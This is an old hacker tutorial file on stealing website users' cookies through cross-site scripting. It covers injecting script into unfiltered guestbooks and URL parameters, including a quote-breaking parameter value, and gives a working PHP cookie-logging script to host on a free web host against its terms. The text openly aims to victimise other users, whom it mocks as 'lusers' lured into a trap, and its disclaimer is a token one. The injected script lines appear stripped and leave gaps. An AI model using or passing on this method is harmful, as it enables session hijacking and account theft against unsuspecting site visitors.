Cookie Stealing for phun and profit

[root@Athleone] ~
$ cat cookiestealing.txt

Cookie Stealing
Written by Athleone(or D4T4_L33CH)
===============================================
######################################################
0x10 Introduction

XSS (cross site scripting) is usually criticized. It is said that XSS can do nothing, actually. All it can do is make a nice little alert box on your screen, telling you your cookies. That is a wrong assumption. Although it may be slightly difficult, you can use XSS to steal a user's cookies. Cookies are used to store valuable information such as Username, Password, IP address and much more. This tutorial aims at teaching you Cookie Stealing, and by the end of this text file, you should be able to independently steal other people's cookies.

DISCLAIMER:
This text is for educational purposes only. The author will not be held liable for any damages that occur from a reader for following this text or even learning from it.

######################################################
0x20 Finding the vulnerability

First, you have to find the XSS vulnerability. This may prove to be a bit of a challenge, but for sites with lower security, this is actually quite easy. For example, have you ever seen one of those guestbooks? Some of them are not properly configured to filter the text you type in. What does this mean? It means that you can manipulate the HTML of the page, and inject javascript code! Alright, let's start off with something simple. Type this into the guestbook:


Okay, now that's done, click enter. If the guestbook does not properly check its input, then you should be able to see your cookie pop up! Of course, if you type that in and it doesn't work, its probably gonna be a bit embarrassing, especially when the site admin taunts you. Anyway, to test whether a guestbook properly filters its input, type something like "You guys suck." and see if the "suck" comes up in bold text.
If it does, the guestbook is probably not configured to filter input. However, XSS is not limited to guest books. Places in which you can change the HTML such as a page that uses a URL parameter to display an image or text, can be injected with a healthy dose
of XSS. For example, the URL is this:
site/bla.php?whatever=lol.gif
Now, imagine what the HTML for the image would be like...

so they add a "> at the back, which means we can do this:
(start URL here)
site/bla.php?whatever=lol.gif">
######################################################

0x40 The Stealing
But once the luser goes to the site, what do you do then? "Hey, tell me all that info in that suspicious looking text box please?" Yeah right.
This is where the PHP code comes in. Get a free web host that supports PHP (preferably something like www.t35.com, although you will be breaking the rules in their TOS...) and make a new file. In the new file, type in this:


Code :-






$stuff=$_GET['stuff'] . "\n";

$fh=fopen('evil.txt','ab');

fwrite($fh,$stuff);

fclose($fh);

?>








Wheee that was fun. Alright, save it as evil.php. Now make an empty text file named evil.txt, and type some stuff into it such as "Cookie Stealer Phile (Newline here)". Alright, now you have to change the script that you put into the vulnerable site. Change it to



Of course, change (site) into your site, and you are ready to go! Whenever a new luser gets lured into the trap, his cookies will be added to evil.txt!
######################################################